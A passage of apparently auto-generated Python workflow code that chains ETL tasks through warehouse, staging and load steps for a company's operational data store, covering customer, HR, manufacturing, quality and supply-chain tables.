ODS_UC_RFQ_Freight_Estimate_MAP_LD.set_downstream(UC_RFQ_Freight_Estimate_MAP)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_RFQ_Critical_Parts_MAP_WH)
ODS_UC_RFQ_Critical_Parts_MAP_WH.set_downstream(UC_RFQ_Critical_Parts_MAP_STG)
UC_RFQ_Critical_Parts_MAP_STG.set_downstream(ODS_UC_RFQ_Critical_Parts_MAP_LD)
ODS_UC_RFQ_Critical_Parts_MAP_LD.set_downstream(UC_RFQ_Critical_Parts_MAP)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_RFQ_Key_parts_MAP_WH)
ODS_UC_RFQ_Key_parts_MAP_WH.set_downstream(UC_RFQ_Key_parts_MAP_STG)
UC_RFQ_Key_parts_MAP_STG.set_downstream(ODS_UC_RFQ_Key_parts_MAP_LD)
ODS_UC_RFQ_Key_parts_MAP_LD.set_downstream(UC_RFQ_Key_parts_MAP)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Company_and_Background_Check_WH)
ODS_UC_Company_and_Background_Check_WH.set_downstream(UC_Company_and_Background_Check_STG)
UC_Company_and_Background_Check_STG.set_downstream(ODS_UC_Company_and_Background_Check_LD)
ODS_UC_Company_and_Background_Check_LD.set_downstream(UC_Company_and_Background_Check)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Customer_PO_Management_WH)
ODS_UC_Customer_PO_Management_WH.set_downstream(UC_Customer_PO_Management_STG)
UC_Customer_PO_Management_STG.set_downstream(ODS_UC_Customer_PO_Management_LD)
ODS_UC_Customer_PO_Management_LD.set_downstream(UC_Customer_PO_Management)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_NC_Customer_Rebate_PN_WH)
ODS_UC_NC_Customer_Rebate_PN_WH.set_downstream(UC_NC_Customer_Rebate_PN_STG)
UC_NC_Customer_Rebate_PN_STG.set_downstream(ODS_UC_NC_Customer_Rebate_PN_LD)
ODS_UC_NC_Customer_Rebate_PN_LD.set_downstream(UC_NC_Customer_Rebate_PN)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Risk_Shipment_Weekly_WH)
ODS_UC_Risk_Shipment_Weekly_WH.set_downstream(UC_Risk_Shipment_Weekly_STG)
UC_Risk_Shipment_Weekly_STG.set_downstream(ODS_UC_Risk_Shipment_Weekly_LD)
ODS_UC_Risk_Shipment_Weekly_LD.set_downstream(UC_Risk_Shipment_Weekly)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_NC_ROYALTY_REPORT_WH)
ODS_UC_NC_ROYALTY_REPORT_WH.set_downstream(UC_NC_ROYALTY_REPORT_STG)
UC_NC_ROYALTY_REPORT_STG.set_downstream(ODS_UC_NC_ROYALTY_REPORT_LD)
ODS_UC_NC_ROYALTY_REPORT_LD.set_downstream(UC_NC_ROYALTY_REPORT)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_GBD.ODS_UG_PIPELINE_PROJECT_CONVERSION_WH
proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UG_PIPELINE_PROJECT_CONVERSION_WH)
ODS_UG_PIPELINE_PROJECT_CONVERSION_WH.set_downstream(UG_PIPELINE_PROJECT_CONVERSION_STG)
UG_PIPELINE_PROJECT_CONVERSION_STG.set_downstream(ODS_UG_PIPELINE_PROJECT_CONVERSION_LD)
ODS_UG_PIPELINE_PROJECT_CONVERSION_LD.set_downstream(UG_PIPELINE_PROJECT_CONVERSION)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_HRM.ODS_UH_SENIORITY_WH
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_SENIORITY_WH)
ODS_UH_SENIORITY_WH.set_downstream(UH_SENIORITY_STG)
UH_SENIORITY_STG.set_downstream(ODS_UH_SENIORITY_LD)
ODS_UH_SENIORITY_LD.set_downstream(UH_SENIORITY)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_HEADCOUNT_BUDGET_WH)
ODS_UH_HEADCOUNT_BUDGET_WH.set_downstream(UH_HEADCOUNT_BUDGET_STG)
UH_HEADCOUNT_BUDGET_STG.set_downstream(ODS_UH_HEADCOUNT_BUDGET_LD)
ODS_UH_HEADCOUNT_BUDGET_LD.set_downstream(UH_HEADCOUNT_BUDGET)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_RDEXPENSE_WH)
ODS_UH_RDEXPENSE_WH.set_downstream(UH_RDEXPENSE_STG)
UH_RDEXPENSE_STG.set_downstream(ODS_UH_RDEXPENSE_LD)
ODS_UH_RDEXPENSE_LD.set_downstream(UH_RDEXPENSE)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_WORKPLACE_MAPPING_WH)
ODS_UH_WORKPLACE_MAPPING_WH.set_downstream(UH_WORKPLACE_MAPPING_STG)
UH_WORKPLACE_MAPPING_STG.set_downstream(ODS_UH_WORKPLACE_MAPPING_LD)
ODS_UH_WORKPLACE_MAPPING_LD.set_downstream(UH_WORKPLACE_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_WORKLOCATION_WH)
ODS_UH_WORKLOCATION_WH.set_downstream(UH_WORKLOCATION_STG)
UH_WORKLOCATION_STG.set_downstream(ODS_UH_WORKLOCATION_LD)
ODS_UH_WORKLOCATION_LD.set_downstream(UH_WORKLOCATION)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_WORKLOCATION_MAPPING_WH)
ODS_UH_WORKLOCATION_MAPPING_WH.set_downstream(UH_WORKLOCATION_MAPPING_STG)
UH_WORKLOCATION_MAPPING_STG.set_downstream(ODS_UH_WORKLOCATION_MAPPING_LD)
ODS_UH_WORKLOCATION_MAPPING_LD.set_downstream(UH_WORKLOCATION_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_DEPTABBRE_BU_MAPPING_WH)
ODS_UH_DEPTABBRE_BU_MAPPING_WH.set_downstream(UH_DEPTABBRE_BU_MAPPING_STG)
UH_DEPTABBRE_BU_MAPPING_STG.set_downstream(ODS_UH_DEPTABBRE_BU_MAPPING_LD)
ODS_UH_DEPTABBRE_BU_MAPPING_LD.set_downstream(UH_DEPTABBRE_BU_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_DEPTABBRE_WH)
ODS_UH_DEPTABBRE_WH.set_downstream(UH_DEPTABBRE_STG)
UH_DEPTABBRE_STG.set_downstream(ODS_UH_DEPTABBRE_LD)
ODS_UH_DEPTABBRE_LD.set_downstream(UH_DEPTABBRE)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_DEPTUNIT_MAPPING_WH)
ODS_UH_DEPTUNIT_MAPPING_WH.set_downstream(UH_DEPTUNIT_MAPPING_STG)
UH_DEPTUNIT_MAPPING_STG.set_downstream(ODS_UH_DEPTUNIT_MAPPING_LD)
ODS_UH_DEPTUNIT_MAPPING_LD.set_downstream(UH_DEPTUNIT_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_PERSONNEL_CATEGORY_WH)
ODS_UH_PERSONNEL_CATEGORY_WH.set_downstream(UH_PERSONNEL_CATEGORY_STG)
UH_PERSONNEL_CATEGORY_STG.set_downstream(ODS_UH_PERSONNEL_CATEGORY_LD)
ODS_UH_PERSONNEL_CATEGORY_LD.set_downstream(UH_PERSONNEL_CATEGORY)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_PERSONNEL_CATEGORY_MAPPING_WH)
ODS_UH_PERSONNEL_CATEGORY_MAPPING_WH.set_downstream(UH_PERSONNEL_CATEGORY_MAPPING_STG)
UH_PERSONNEL_CATEGORY_MAPPING_STG.set_downstream(ODS_UH_PERSONNEL_CATEGORY_MAPPING_LD)
ODS_UH_PERSONNEL_CATEGORY_MAPPING_LD.set_downstream(UH_PERSONNEL_CATEGORY_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_PERSONNEL_SUBCATE_MAPPING_WH)
ODS_UH_PERSONNEL_SUBCATE_MAPPING_WH.set_downstream(UH_PERSONNEL_SUBCATE_MAPPING_STG)
UH_PERSONNEL_SUBCATE_MAPPING_STG.set_downstream(ODS_UH_PERSONNEL_SUBCATE_MAPPING_LD)
ODS_UH_PERSONNEL_SUBCATE_MAPPING_LD.set_downstream(UH_PERSONNEL_SUBCATE_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_EMPLOYMENTTYPE_MAPPING_WH)
ODS_UH_EMPLOYMENTTYPE_MAPPING_WH.set_downstream(UH_EMPLOYMENTTYPE_MAPPING_STG)
UH_EMPLOYMENTTYPE_MAPPING_STG.set_downstream(ODS_UH_EMPLOYMENTTYPE_MAPPING_LD)
ODS_UH_EMPLOYMENTTYPE_MAPPING_LD.set_downstream(UH_EMPLOYMENTTYPE_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_STAFFSTATUS_WH)
ODS_UH_STAFFSTATUS_WH.set_downstream(UH_STAFFSTATUS_STG)
UH_STAFFSTATUS_STG.set_downstream(ODS_UH_STAFFSTATUS_LD)
ODS_UH_STAFFSTATUS_LD.set_downstream(UH_STAFFSTATUS)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_STAFFSTATUS_TOBE_ONBOARD_WH)
ODS_UH_STAFFSTATUS_TOBE_ONBOARD_WH.set_downstream(UH_STAFFSTATUS_TOBE_ONBOARD_STG)
UH_STAFFSTATUS_TOBE_ONBOARD_STG.set_downstream(ODS_UH_STAFFSTATUS_TOBE_ONBOARD_LD)
ODS_UH_STAFFSTATUS_TOBE_ONBOARD_LD.set_downstream(UH_STAFFSTATUS_TOBE_ONBOARD)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_GRADE_MAPPING_WH)
ODS_UH_GRADE_MAPPING_WH.set_downstream(UH_GRADE_MAPPING_STG)
UH_GRADE_MAPPING_STG.set_downstream(ODS_UH_GRADE_MAPPING_LD)
ODS_UH_GRADE_MAPPING_LD.set_downstream(UH_GRADE_MAPPING)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_EDUCATION_MAPPING_WH)
ODS_UH_EDUCATION_MAPPING_WH.set_downstream(UH_EDUCATION_MAPPING_STG)
UH_EDUCATION_MAPPING_STG.set_downstream(ODS_UH_EDUCATION_MAPPING_LD)
ODS_UH_EDUCATION_MAPPING_LD.set_downstream(UH_EDUCATION_MAPPING)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_MFG.ODS_UM_RiskShipmentUpload_WH
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_RiskShipmentUpload_WH)
ODS_UM_RiskShipmentUpload_WH.set_downstream(UM_RiskShipmentUpload_STG)
UM_RiskShipmentUpload_STG.set_downstream(ODS_UM_RiskShipmentUpload_LD)
ODS_UM_RiskShipmentUpload_LD.set_downstream(UM_RiskShipmentUpload)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_SMT_TIME_WH)
ODS_UM_SMT_TIME_WH.set_downstream(UM_SMT_TIME_STG)
UM_SMT_TIME_STG.set_downstream(ODS_UM_SMT_TIME_LD)
ODS_UM_SMT_TIME_LD.set_downstream(UM_SMT_TIME)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_SMT_WH)
ODS_UM_SMT_WH.set_downstream(UM_SMT_STG)
UM_SMT_STG.set_downstream(ODS_UM_SMT_LD)
ODS_UM_SMT_LD.set_downstream(UM_SMT)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_ForecastUploadModel_WH)
ODS_UM_ForecastUploadModel_WH.set_downstream(UM_ForecastUploadModel_STG)
UM_ForecastUploadModel_STG.set_downstream(ODS_UM_ForecastUploadModel_LD)
ODS_UM_ForecastUploadModel_LD.set_downstream(UM_ForecastUploadModel)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_Shift_WH)
ODS_UM_Shift_WH.set_downstream(UM_Shift_STG)
UM_Shift_STG.set_downstream(ODS_UM_Shift_LD)
ODS_UM_Shift_LD.set_downstream(UM_Shift)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_Resource_Mapping_Process_WH)
ODS_UM_Resource_Mapping_Process_WH.set_downstream(UM_Resource_Mapping_Process_STG)
UM_Resource_Mapping_Process_STG.set_downstream(ODS_UM_Resource_Mapping_Process_LD)
ODS_UM_Resource_Mapping_Process_LD.set_downstream(UM_Resource_Mapping_Process)
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UM_Work_in_Process_Category_WH)
ODS_UM_Work_in_Process_Category_WH.set_downstream(UM_Work_in_Process_Category_STG)
UM_Work_in_Process_Category_STG.set_downstream(ODS_UM_Work_in_Process_Category_LD)
ODS_UM_Work_in_Process_Category_LD.set_downstream(UM_Work_in_Process_Category)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_PRD.ODS_UP_consign_vendor_prod_map_WH
proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UP_consign_vendor_prod_map_WH)
ODS_UP_consign_vendor_prod_map_WH.set_downstream(UP_consign_vendor_prod_map_STG)
UP_consign_vendor_prod_map_STG.set_downstream(ODS_UP_consign_vendor_prod_map_LD)
ODS_UP_consign_vendor_prod_map_LD.set_downstream(UP_consign_vendor_prod_map)
proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UP_Expense_Budget_prod_map_WH)
ODS_UP_Expense_Budget_prod_map_WH.set_downstream(UP_Expense_Budget_prod_map_STG)
UP_Expense_Budget_prod_map_STG.set_downstream(ODS_UP_Expense_Budget_prod_map_LD)
ODS_UP_Expense_Budget_prod_map_LD.set_downstream(UP_Expense_Budget_prod_map)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_QAM.ODS_UQ_MtlScrapCost_WH
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_MtlScrapCost_WH)
ODS_UQ_MtlScrapCost_WH.set_downstream(UQ_MtlScrapCost_STG)
UQ_MtlScrapCost_STG.set_downstream(ODS_UQ_MtlScrapCost_LD)
ODS_UQ_MtlScrapCost_LD.set_downstream(UQ_MtlScrapCost)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_CSDCustomerPaidService_WH)
ODS_UQ_CSDCustomerPaidService_WH.set_downstream(UQ_CSDCustomerPaidService_STG)
UQ_CSDCustomerPaidService_STG.set_downstream(ODS_UQ_CSDCustomerPaidService_LD)
ODS_UQ_CSDCustomerPaidService_LD.set_downstream(UQ_CSDCustomerPaidService)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_CSDPlannedShippingQty_WH)
ODS_UQ_CSDPlannedShippingQty_WH.set_downstream(UQ_CSDPlannedShippingQty_STG)
UQ_CSDPlannedShippingQty_STG.set_downstream(ODS_UQ_CSDPlannedShippingQty_LD)
ODS_UQ_CSDPlannedShippingQty_LD.set_downstream(UQ_CSDPlannedShippingQty)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_InventoryOwner_WH)
ODS_UQ_InventoryOwner_WH.set_downstream(UQ_InventoryOwner_STG)
UQ_InventoryOwner_STG.set_downstream(ODS_UQ_InventoryOwner_LD)
ODS_UQ_InventoryOwner_LD.set_downstream(UQ_InventoryOwner)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_OnSiteReworkQty_WH)
ODS_UQ_OnSiteReworkQty_WH.set_downstream(UQ_OnSiteReworkQty_STG)
UQ_OnSiteReworkQty_STG.set_downstream(ODS_UQ_OnSiteReworkQty_LD)
ODS_UQ_OnSiteReworkQty_LD.set_downstream(UQ_OnSiteReworkQty)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_QualityReturnQty_WH)
ODS_UQ_QualityReturnQty_WH.set_downstream(UQ_QualityReturnQty_STG)
UQ_QualityReturnQty_STG.set_downstream(ODS_UQ_QualityReturnQty_LD)
ODS_UQ_QualityReturnQty_LD.set_downstream(UQ_QualityReturnQty)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_JQMList_WH)
ODS_UQ_JQMList_WH.set_downstream(UQ_JQMList_STG)
UQ_JQMList_STG.set_downstream(ODS_UQ_JQMList_LD)
ODS_UQ_JQMList_LD.set_downstream(UQ_JQMList)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_S1_WH)
ODS_UQ_IQC_DailyManpower_S1_WH.set_downstream(UQ_IQC_DailyManpower_S1_STG)
UQ_IQC_DailyManpower_S1_STG.set_downstream(ODS_UQ_IQC_DailyManpower_S1_LD)
ODS_UQ_IQC_DailyManpower_S1_LD.set_downstream(UQ_IQC_DailyManpower_S1)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NQJ_WH)
ODS_UQ_IQC_DailyManpower_NQJ_WH.set_downstream(UQ_IQC_DailyManpower_NQJ_STG)
UQ_IQC_DailyManpower_NQJ_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NQJ_LD)
ODS_UQ_IQC_DailyManpower_NQJ_LD.set_downstream(UQ_IQC_DailyManpower_NQJ)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NYC_WH)
ODS_UQ_IQC_DailyManpower_NYC_WH.set_downstream(UQ_IQC_DailyManpower_NYC_STG)
UQ_IQC_DailyManpower_NYC_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NYC_LD)
ODS_UQ_IQC_DailyManpower_NYC_LD.set_downstream(UQ_IQC_DailyManpower_NYC)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NQX_WH)
ODS_UQ_IQC_DailyManpower_NQX_WH.set_downstream(UQ_IQC_DailyManpower_NQX_STG)
UQ_IQC_DailyManpower_NQX_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NQX_LD)
ODS_UQ_IQC_DailyManpower_NQX_LD.set_downstream(UQ_IQC_DailyManpower_NQX)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NVN_WH)
ODS_UQ_IQC_DailyManpower_NVN_WH.set_downstream(UQ_IQC_DailyManpower_NVN_STG)
UQ_IQC_DailyManpower_NVN_STG.set_downstream(ODS_UQ_IQC_DailyManpower_NVN_LD)
ODS_UQ_IQC_DailyManpower_NVN_LD.set_downstream(UQ_IQC_DailyManpower_NVN)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_IQC_DailyManpower_S2_WH)
ODS_UQ_IQC_DailyManpower_S2_WH.set_downstream(UQ_IQC_DailyManpower_S2_STG)
UQ_IQC_DailyManpower_S2_STG.set_downstream(ODS_UQ_IQC_DailyManpower_S2_LD)
ODS_UQ_IQC_DailyManpower_S2_LD.set_downstream(UQ_IQC_DailyManpower_S2)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_InventoryOwnerList_WH)
ODS_UQ_InventoryOwnerList_WH.set_downstream(UQ_InventoryOwnerList_STG)
UQ_InventoryOwnerList_STG.set_downstream(ODS_UQ_InventoryOwnerList_LD)
ODS_UQ_InventoryOwnerList_LD.set_downstream(UQ_InventoryOwnerList)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_MoPartType_WH)
ODS_UQ_MoPartType_WH.set_downstream(UQ_MoPartType_STG)
UQ_MoPartType_STG.set_downstream(ODS_UQ_MoPartType_LD)
ODS_UQ_MoPartType_LD.set_downstream(UQ_MoPartType)
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_Escape_WH)
ODS_UQ_Escape_WH.set_downstream(UQ_Escape_STG)
UQ_Escape_STG.set_downstream(ODS_UQ_Escape_LD)
ODS_UQ_Escape_LD.set_downstream(UQ_Escape)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_SCM.ODS_US_reason_code_WH
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_reason_code_WH)
ODS_US_reason_code_WH.set_downstream(US_reason_code_STG)
US_reason_code_STG.set_downstream(ODS_US_reason_code_LD)
ODS_US_reason_code_LD.set_downstream(US_reason_code)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_scrap_reason_code_WH)
ODS_US_scrap_reason_code_WH.set_downstream(US_scrap_reason_code_STG)
US_scrap_reason_code_STG.set_downstream(ODS_US_scrap_reason_code_LD)
ODS_US_scrap_reason_code_LD.set_downstream(US_scrap_reason_code)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_BOM_PRODUCT_LIST_WH)
ODS_US_BOM_PRODUCT_LIST_WH.set_downstream(US_BOM_PRODUCT_LIST_STG)
US_BOM_PRODUCT_LIST_STG.set_downstream(ODS_US_BOM_PRODUCT_LIST_LD)
ODS_US_BOM_PRODUCT_LIST_LD.set_downstream(US_BOM_PRODUCT_LIST)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_POTransfer_WH)
ODS_US_POTransfer_WH.set_downstream(US_POTransfer_STG)
US_POTransfer_STG.set_downstream(ODS_US_POTransfer_LD)
ODS_US_POTransfer_LD.set_downstream(US_POTransfer)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_US_ExcessonHandTransfer_WH)
ODS_US_ExcessonHandTransfer_WH.set_downstream(US_ExcessonHandTransfer_STG)
US_ExcessonHandTransfer_STG.set_downstream(ODS_US_ExcessonHandTransfer_LD)
ODS_US_ExcessonHandTransfer_LD.set_downstream(US_ExcessonHandTransfer)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: W_ODS_QAM.ODS_UQ_FaultInjectionRecord_WH
proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_FaultInjectionRecord_WH)
ODS_UQ_FaultInjectionRecord_WH.set_downstream(UQ_FaultInjectionRecord_STG)
UQ_FaultInjectionRecord_STG.set_downstream(ODS_UQ_FaultInjectionRecord_LD)
ODS_UQ_FaultInjectionRecord_LD.set_downstream(UQ_FaultInjectionRecord)
proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_QSCANTrackingRecord_WH)
ODS_UQ_QSCANTrackingRecord_WH.set_downstream(UQ_QSCANTrackingRecord_STG)
UQ_QSCANTrackingRecord_STG.set_downstream(ODS_UQ_QSCANTrackingRecord_LD)
ODS_UQ_QSCANTrackingRecord_LD.set_downstream(UQ_QSCANTrackingRecord)
proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UQ_ModelMPInfo_WH)
ODS_UQ_ModelMPInfo_WH.set_downstream(UQ_ModelMPInfo_STG)
UQ_ModelMPInfo_STG.set_downstream(ODS_UQ_ModelMPInfo_LD)
ODS_UQ_ModelMPInfo_LD.set_downstream(UQ_ModelMPInfo)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: M_ODS_CUS.ODS_UC_Customer_Grouping_Map_WH
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Customer_Grouping_Map_WH)
ODS_UC_Customer_Grouping_Map_WH.set_downstream(UC_Customer_Grouping_Map_STG)
UC_Customer_Grouping_Map_STG.set_downstream(ODS_UC_Customer_Grouping_Map_LD)
ODS_UC_Customer_Grouping_Map_LD.set_downstream(UC_Customer_Grouping_Map)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Group_Customer_Location_WH)
ODS_UC_Group_Customer_Location_WH.set_downstream(UC_Group_Customer_Location_STG)
UC_Group_Customer_Location_STG.set_downstream(ODS_UC_Group_Customer_Location_LD)
ODS_UC_Group_Customer_Location_LD.set_downstream(UC_Group_Customer_Location)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Project_Decision_Customer_WH)
ODS_UC_Project_Decision_Customer_WH.set_downstream(UC_Project_Decision_Customer_STG)
UC_Project_Decision_Customer_STG.set_downstream(ODS_UC_Project_Decision_Customer_LD)
ODS_UC_Project_Decision_Customer_LD.set_downstream(UC_Project_Decision_Customer)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_NA_Customer_Sub_Group_WH)
ODS_UC_NA_Customer_Sub_Group_WH.set_downstream(UC_NA_Customer_Sub_Group_STG)
UC_NA_Customer_Sub_Group_STG.set_downstream(ODS_UC_NA_Customer_Sub_Group_LD)
ODS_UC_NA_Customer_Sub_Group_LD.set_downstream(UC_NA_Customer_Sub_Group)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Group_Customer_Industry_Type_WH)
ODS_UC_Group_Customer_Industry_Type_WH.set_downstream(UC_Group_Customer_Industry_Type_STG)
UC_Group_Customer_Industry_Type_STG.set_downstream(ODS_UC_Group_Customer_Industry_Type_LD)
ODS_UC_Group_Customer_Industry_Type_LD.set_downstream(UC_Group_Customer_Industry_Type)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Global_Telecom_Operator_WH)
ODS_UC_Global_Telecom_Operator_WH.set_downstream(UC_Global_Telecom_Operator_STG)
UC_Global_Telecom_Operator_STG.set_downstream(ODS_UC_Global_Telecom_Operator_LD)
ODS_UC_Global_Telecom_Operator_LD.set_downstream(UC_Global_Telecom_Operator)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Product_Mapping_Table_WH)
ODS_UC_Product_Mapping_Table_WH.set_downstream(UC_Product_Mapping_Table_STG)
UC_Product_Mapping_Table_STG.set_downstream(ODS_UC_Product_Mapping_Table_LD)
ODS_UC_Product_Mapping_Table_LD.set_downstream(UC_Product_Mapping_Table)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Market_Share_Market_Shipment_WH)
ODS_UC_Market_Share_Market_Shipment_WH.set_downstream(UC_Market_Share_Market_Shipment_STG)
UC_Market_Share_Market_Shipment_STG.set_downstream(ODS_UC_Market_Share_Market_Shipment_LD)
ODS_UC_Market_Share_Market_Shipment_LD.set_downstream(UC_Market_Share_Market_Shipment)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_WH)
ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_WH.set_downstream(UC_WNC_BI_SHIPMENT_QTY_TABLE_STG)
UC_WNC_BI_SHIPMENT_QTY_TABLE_STG.set_downstream(ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_LD)
ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_LD.set_downstream(UC_WNC_BI_SHIPMENT_QTY_TABLE)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Product_Segment_Map_table_WH)
ODS_UC_Product_Segment_Map_table_WH.set_downstream(UC_Product_Segment_Map_table_STG)
UC_Product_Segment_Map_table_STG.set_downstream(ODS_UC_Product_Segment_Map_table_LD)
ODS_UC_Product_Segment_Map_table_LD.set_downstream(UC_Product_Segment_Map_table)
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Market_Tam_Product_Map_WH)
ODS_UC_Market_Tam_Product_Map_WH.set_downstream(UC_Market_Tam_Product_Map_STG)
UC_Market_Tam_Product_Map_STG.set_downstream(ODS_UC_Market_Tam_Product_Map_LD)
ODS_UC_Market_Tam_Product_Map_LD.set_downstream(UC_Market_Tam_Product_Map)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: Y_ODS_CUS.ODS_UC_SW_Centric_Product_Model_WH
proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_SW_Centric_Product_Model_WH)
ODS_UC_SW_Centric_Product_Model_WH.set_downstream(UC_SW_Centric_Product_Model_STG)
UC_SW_Centric_Product_Model_STG.set_downstream(ODS_UC_SW_Centric_Product_Model_LD)
ODS_UC_SW_Centric_Product_Model_LD.set_downstream(UC_SW_Centric_Product_Model)
